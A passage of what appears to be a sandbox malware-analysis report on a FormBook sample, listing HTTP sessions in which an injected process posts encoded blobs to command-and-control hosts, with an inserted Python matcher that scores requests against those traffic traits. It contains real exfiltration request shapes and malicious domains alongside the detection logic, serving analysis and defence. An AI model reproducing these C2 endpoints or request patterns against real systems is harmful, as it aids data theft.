User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Oct 8, 2024 15:33:37.817831039 CEST | 395 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Tue, 08 Oct 2024 13:33:37 GMT
Content-Type: text/html
Content-Length: 255
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 57 58 3d 72 6e 57 6c 6c 50 35 50 4c 6c 68 4c 4c 74 6a 26 74 70 54 64 3d 47 7a 46 33 6f 37 65 7a 61 31 64 55 34 46 34 37 36 63 48 48 65 72 61 6c 2f 63 59 4a 47 2b 46 43 77 67 4a 4d 49 7a 30 48 50 6c 66 72 53 43 4d 42 44 56 75 51 66 6a 47 4e 6d 78 42 64 37 6d 6f 56 72 68 43 47 59 32 68 59 37 4d 43 67 4b 2b 4d 6e 65 6b 67 73 74 54 70 30 7a 33 5a 6a 63 50 39 72 6b 36 38 65 6b 34 33 42 48 71 51 44 43 66 63 41 65 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?WX=rnWllP5PLlhLLtj&tpTd=GzF3o7eza1dU4F476cHHeral/cYJG+FCwgJMIz0HPlfrSCMBDVuQfjGNmxBd7moVrhCGY2hY7MCgK+MnekgstTp0z3ZjcP9rk68ek43BHqQDCfcAeg=="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 60551 | 74.208.236.25 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:33:52.914947987 CEST | 746 | OUT | POST /sld7/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.falconclub.online
Origin: http://www.falconclub.online
Cache-Control: max-age=0
Content-Length: 193
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.falconclub.online/sld7/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Raw: 74 70 54 64 3d 79 75 32 4c 63 68 76 55 63 45 70 51 68 56 4e 52 35 64 61 53 69 73 5a 4d 65 41 78 47 73 71 2b 75 4f 57 63 37 70 48 4f 67 48 2b 4b 49 62 72 65 38 37 73 70 4b 44 33 70 74 45 6f 45 48 33 49 42 36 7a 53 64 70 68 4f 56 76 4b 65 78 34 79 6b 4d 71 30 48 56 4b 71 35 58 4a 73 76 33 73 72 70 70 6a 64 6c 31 77 30 2f 59 2b 79 30 4e 74 31 36 7a 4b 76 62 66 6a 64 4c 76 41 70 41 43 6e 49 71 73 45 6f 38 53 36 4b 42 62 36 65 62 69 46 4a 35 63 6e 68 31 58 71 37 48 43 38 78 64 56 57 52 49 2f 62 4e 62 6f 6d 4a 68 41 38 4b 38 30 62 75 50 4c 78 48 52 42 46 45 49 5a 52 67 4a 6b 6e
Data Ascii: tpTd=yu2LchvUcEpQhVNR5daSisZMeAxGsq+uOWc7pHOgH+KIbre87spKD3ptEoEH3IB6zSdphOVvKex4ykMq0HVKq5XJsv3srppjdl1w0/Y+y0Nt16zKvbfjdLvApACnIqsEo8S6KBb6ebiFJ5cnh1Xq7HC8xdVWRI/bNbomJhA8K80buPLxHRBFEIZRgJkn
Oct 8, 2024 15:33:53.420114040 CEST | 580 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Tue, 08 Oct 2024 13:33:53 GMT
Server: Apache
Content-Encoding: gzip
Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
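Sessions 0 and 1 above show the two request shapes this FormBook sample uses from the injected process: a GET to a short single-directory path (/hfue/) with two query parameters, one of them a long base64-alphabet blob, and a POST to another short path (/sld7/) whose form body is a single parameter carrying a similar blob, with Origin and Referer pointing back at the same host and path. Both carry the same User-Agent (Chrome/40 on Windows NT 6.3) and Connection: close, and note that the GET got a generic JavaScript redirect to /lander from an openresty front end while the POST got a 404, so neither response by itself tells you which host is the real C2. The matcher below is an added example, not part of the Joe Sandbox report and not a published FormBook signature: it parses a raw HTTP/1.1 request and counts how many of those traits it shares. The two sample requests are constructed from sessions 0 and 1, the two benign requests are made up as negatives, and the path and parameter-name length ranges, the 64-character minimum for the blob and the hit threshold of three traits are my assumptions fitted to these two requests.

```python
import re
from urllib.parse import urlsplit

# Traits observed in sessions 0 and 1 of the report. Length ranges and the hit
# threshold are assumptions fitted to those two requests, not a published rule.
UA_SEEN = ("Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 "
           "(KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36")
PATH_RE = re.compile(r"^/[a-z0-9]{2,8}/$")           # /hfue/, /sld7/
KEY_RE = re.compile(r"^[A-Za-z]{2,4}$")              # WX, tpTd
B64_RE = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")   # long base64-alphabet blob


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, target, headers, body


def split_form(encoded):
    """Split k=v&k=v without URL-decoding: '+' and '/' are blob data here, not escapes."""
    pairs = []
    for part in encoded.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def score_request(raw):
    """Return the list of traits the request shares with the sessions in the report."""
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    reasons = []
    if PATH_RE.match(url.path):
        reasons.append("short_dir_path")
    if headers.get("user-agent") == UA_SEEN:
        reasons.append("ua_seen_in_report")
    if headers.get("connection", "").lower() == "close":
        reasons.append("connection_close")
    if method == "GET":
        params = split_form(url.query)
        if (len(params) == 2 and all(KEY_RE.match(k) for k, _ in params)
                and any(B64_RE.match(v) for _, v in params)):
            reasons.append("get_two_short_keys_b64_value")
    elif method == "POST":
        params = split_form(body)
        if (headers.get("content-type", "").startswith("application/x-www-form-urlencoded")
                and len(params) == 1 and KEY_RE.match(params[0][0])
                and B64_RE.match(params[0][1])):
            reasons.append("post_single_short_key_b64_body")
        host = headers.get("host", "")
        if (host and headers.get("origin", "") == "http://" + host
                and headers.get("referer", "") == "http://" + host + url.path):
            reasons.append("origin_referer_self")
    return reasons


def is_suspect(raw, threshold=3):
    """Hit when the path shape matches and at least `threshold` traits line up (assumed cut-off)."""
    reasons = score_request(raw)
    return "short_dir_path" in reasons and len(reasons) >= threshold, reasons


# Constructed from the session 0 GET and the session 1 POST shown in the report.
SESSION0_GET = (
    "GET /hfue/?WX=rnWllP5PLlhLLtj&tpTd=GzF3o7eza1dU4F476cHHeral/cYJG+FCwgJMIz0HPlfrSCMBDVuQfjGNmxBd7moVrhCGY2hY7MCgK+MnekgstTp0z3ZjcP9rk68ek43BHqQDCfcAeg== HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\r\n"
    "Accept-Language: en-US,en;q=0.9\r\n"
    "Host: www.multileveltravel.world\r\n"
    "Connection: close\r\n"
    "User-Agent: " + UA_SEEN + "\r\n\r\n"
)
SESSION1_POST = (
    "POST /sld7/ HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\r\n"
    "Accept-Encoding: gzip, deflate, br\r\n"
    "Accept-Language: en-US,en;q=0.9\r\n"
    "Host: www.falconclub.online\r\n"
    "Origin: http://www.falconclub.online\r\n"
    "Cache-Control: max-age=0\r\n"
    "Content-Length: 193\r\n"
    "Connection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Referer: http://www.falconclub.online/sld7/\r\n"
    "User-Agent: " + UA_SEEN + "\r\n\r\n"
    "tpTd=yu2LchvUcEpQhVNR5daSisZMeAxGsq+uOWc7pHOgH+KIbre87spKD3ptEoEH3IB6zSdphOVvKex4ykMq0HVKq5XJsv3srppjdl1w0/Y+y0Nt16zKvbfjdLvApACnIqsEo8S6KBb6ebiFJ5cnh1Xq7HC8xdVWRI/bNbomJhA8K80buPLxHRBFEIZRgJkn"
)
# Made-up negatives: an ordinary page fetch and an ordinary login form post.
BENIGN_GET = (
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nConnection: keep-alive\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36\r\n\r\n"
)
BENIGN_POST = (
    "POST /login/ HTTP/1.1\r\nHost: intranet.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 22\r\nConnection: keep-alive\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36\r\n\r\n"
    "user=alice&pass=secret"
)
```

The benign POST to /login/ is included because it satisfies the path-shape trait on its own, which is why a single trait never fires; it only scores one, while the session 0 GET scores four and the session 1 POST five. The User-Agent trait is the brittle one (a rebuilt sample can change it), so in a production rule weight the body and query shape over the exact UA string.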


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 60552 | 74.208.236.25 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:33:55.464616060 CEST | 770 | OUT | POST /sld7/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.falconclub.online
Origin: http://www.falconclub.online
Cache-Control: max-age=0
Content-Length: 217
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.falconclub.online/sld7/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Raw: 74 70 54 64 3d 79 75 32 4c 63 68 76 55 63 45 70 51 7a 6d 46 52 37 2b 43 53 79 38 5a 4e 64 41 78 47 35 36 2b 79 4f 57 51 37 70 46 69 77 48 6f 61 49 61 4c 4f 38 36 74 70 4b 47 33 70 74 4f 49 45 4f 70 34 42 4c 7a 53 52 51 68 4b 64 76 4b 61 68 34 79 68 77 71 31 32 56 56 72 70 58 50 68 50 33 75 32 35 70 6a 64 6c 31 77 30 2f 4d 45 79 77 68 74 31 4b 44 4b 39 71 66 67 65 4c 76 44 71 41 43 6e 4d 71 73 49 6f 38 54 66 4b 41 48 51 65 66 53 46 4a 38 59 6e 68 67 6a 70 31 48 43 6d 39 4e 56 46 43 4d 6d 78 4a 5a 6b 30 41 58 45 71 54 76 67 72 67 4f 72 76 57 6a 49 65 52 66 5a 32 6e 75 74 50 62 61 49 31 4a 4a 38 6c 41 2f 4c 6c 49 67 4e 61 35 79 4b 5a 34 67 3d 3d
Data Ascii: tpTd=yu2LchvUcEpQzmFR7+CSy8ZNdAxG56+yOWQ7pFiwHoaIaLO86tpKG3ptOIEOp4BLzSRQhKdvKah4yhwq12VVrpXPhP3u25pjdl1w0/MEywht1KDK9qfgeLvDqACnMqsIo8TfKAHQefSFJ8Ynhgjp1HCm9NVFCMmxJZk0AXEqTvgrgOrvWjIeRfZ2nutPbaI1JJ8lA/LlIgNa5yKZ4g==
Oct 8, 2024 15:33:55.974159956 CEST | 580 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Tue, 08 Oct 2024 13:33:55 GMT
Server: Apache
Content-Encoding: gzip
Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 60559 | 74.208.236.25 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:33:58.003472090 CEST | 1783 | OUT | POST /sld7/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.falconclub.online
Origin: http://www.falconclub.online
Cache-Control: max-age=0
Content-Length: 1229
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.falconclub.online/sld7/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Raw: 74 70 54 64 3d 79 75 32 4c 63 68 76 55 63 45 70 51 7a 6d 46 52 37 2b 43 53 79 38 5a 4e 64 41 78 47 35 36 2b 79 4f 57 51 37 70 46 69 77 48 6f 53 49 62 34 32 38 37 4f 42 4b 46 33 70 74 56 49 45 4c 70 34 42 53 7a 53 49 59 68 4b 51 51 4b 59 70 34 77 44 6f 71 39 69 35 56 69 70 58 50 2b 66 33 74 72 70 70 4d 64 6c 6c 38 30 2f 63 45 79 77 68 74 31 49 72 4b 2b 37 66 67 59 4c 76 41 70 41 43 37 49 71 74 56 6f 38 4b 69 4b 44 72 71 65 4d 61 46 4d 73 49 6e 67 53 37 70 39 48 43 34 2b 4e 55 59 43 4a 2b 71 4a 5a 34 4a 41 58 59 45 54 76 59 72 6b 59 61 32 41 67 34 65 48 4d 46 6b 6e 39 52 39 5a 4d 73 67 50 64 4d 68 59 71 48 6c 64 67 6f 4d 37 43 62 75 73 58 64 39 57 67 75 45 42 6f 73 2b 45 58 58 47 75 37 36 6e 63 6f 7a 37 2b 4b 44 41 61 50 72 58 59 64 58 74 75 64 45 68 77 72 4b 33 45 67 4f 76 53 6e 64 47 68 54 35 51 31 48 39 35 30 77 44 58 4f 47 58 53 77 2b 68 75 4b 32 56 6c 34 73 77 71 38 64 44 34 58 34 59 4e 43 46 52 37 78 71 50 6c 70 6d 57 55 50 67 67 55 68 47 55 6c 55 35 4b 2b 63 4f 62 4a 56 69 6b 43 55 49 41 47 49 [TRUNCATED]
Data Ascii: tpTd=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 [TRUNCATED]
Oct 8, 2024 15:33:58.518306971 CEST | 580 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Tue, 08 Oct 2024 13:33:58 GMT
Server: Apache
Content-Encoding: gzip
Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 60575 | 74.208.236.25 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:34:00.898246050 CEST | 478 | OUT | GET /sld7/?tpTd=/serfU6kaxhlkkJx8dOr0qlSRXA+6La0KEB68G6jbYfyT6z2zvVJBFhkOYA104kn6FRHm7lAc7gn2TRu9DlziYvx9tC/5P1WJl131MkdoxRdpo/lsw==&WX=rnWllP5PLlhLLtj HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.falconclub.online
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Oct 8, 2024 15:34:01.419403076 CEST | 770 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 626
Connection: close
Date: Tue, 08 Oct 2024 13:34:01 GMT
Server: Apache
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 60611 | 3.33.130.190 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:34:06.474298000 CEST | 743 | OUT | POST /abrg/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.promasterev.shop
Origin: http://www.promasterev.shop
Cache-Control: max-age=0
Content-Length: 193
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.promasterev.shop/abrg/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Raw: 74 70 54 64 3d 4c 6c 6f 70 6c 55 78 78 4b 78 65 58 38 6e 36 55 75 30 35 55 6a 71 6c 37 62 6e 44 52 5a 51 62 4c 6e 33 4e 43 33 2f 35 65 47 64 43 32 6f 44 4b 4b 48 46 4b 45 79 70 6d 72 56 61 39 69 39 61 79 66 42 61 4b 4a 2f 66 71 37 69 56 35 71 55 4e 79 6b 33 4b 4f 4f 47 35 6a 6c 73 4a 74 4f 48 63 50 55 64 4b 78 65 78 47 6c 67 48 4d 38 43 6d 66 55 47 78 79 47 36 65 44 34 4d 46 4c 65 72 61 72 66 44 63 51 4d 47 72 57 72 43 69 67 38 48 4b 67 34 78 4d 73 52 70 45 63 36 63 66 70 32 33 55 30 76 6b 75 31 51 66 4b 6e 64 69 55 66 64 33 55 57 30 35 50 4f 68 46 74 4b 6c 66 51 34 31 6b
Data Ascii: tpTd=LloplUxxKxeX8n6Uu05Ujql7bnDRZQbLn3NC3/5eGdC2oDKKHFKEypmrVa9i9ayfBaKJ/fq7iV5qUNyk3KOOG5jlsJtOHcPUdKxexGlgHM8CmfUGxyG6eD4MFLerarfDcQMGrWrCig8HKg4xMsRpEc6cfp23U0vku1QfKndiUfd3UW05POhFtKlfQ41k


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 60627 | 3.33.130.190 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:34:09.021058083 CEST | 767 | OUT | POST /abrg/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.promasterev.shop
Origin: http://www.promasterev.shop
Cache-Control: max-age=0
Content-Length: 217
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.promasterev.shop/abrg/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Raw: 74 70 54 64 3d 4c 6c 6f 70 6c 55 78 78 4b 78 65 58 38 48 71 55 76 54 74 55 6c 4b 6c 38 58 48 44 52 51 77 62 48 6e 33 4a 43 33 2b 39 4f 47 6f 71 32 6f 68 53 4b 56 30 4b 45 78 70 6d 72 62 36 39 72 35 61 79 75 42 61 32 42 2f 64 4f 37 69 57 46 71 55 4d 43 6b 33 37 4f 4e 48 70 6a 6e 68 70 74 41 61 73 50 55 64 4b 78 65 78 47 42 4f 48 4d 6b 43 6d 76 45 47 79 51 2b 39 55 6a 34 4e 41 4c 65 72 51 4c 65 72 63 51 4d 30 72 55 66 34 69 6a 55 48 4b 67 6f 78 4e 2b 70 6f 4e 63 36 53 52 4a 33 39 46 46 79 4b 72 6e 73 2b 55 33 42 55 4d 4f 31 6c 58 33 55 6e 65 38 6f 65 34 64 6c 34 58 66 38 4d 4c 7a 51 33 55 45 4d 42 59 46 39 65 6d 53 79 7a 6e 74 2b 71 7a 67 3d 3d
Data Ascii: tpTd=LloplUxxKxeX8HqUvTtUlKl8XHDRQwbHn3JC3+9OGoq2ohSKV0KExpmrb69r5ayuBa2B/dO7iWFqUMCk37ONHpjnhptAasPUdKxexGBOHMkCmvEGyQ+9Uj4NALerQLercQM0rUf4ijUHKgoxN+poNc6SRJ39FFyKrns+U3BUMO1lX3Une8oe4dl4Xf8MLzQ3UEMBYF9emSyznt+qzg==


Session ID: 7 | Source: 192.168.2.9:60641 | Destination: 3.33.130.190:80 | PID: 1432 | Process: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:34:11.565047026 CEST | 1780 | OUT | POST /abrg/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
